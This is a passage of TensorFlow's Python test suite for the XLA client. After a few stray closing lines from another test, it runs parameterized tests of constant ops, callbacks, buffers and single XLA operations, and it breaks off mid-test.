for thread in threads:
thread.join()
for event in success_events:
assert event.is_set()
assert _can_connect(origin, endpoint)
assert not _can_connect(origin, endpoint)
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_]
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool_ dtype."""
return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
def testTokens(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_host_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
self.assertEqual(self.backend.devices()[0].live_buffers(),
self.backend.live_buffers())
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
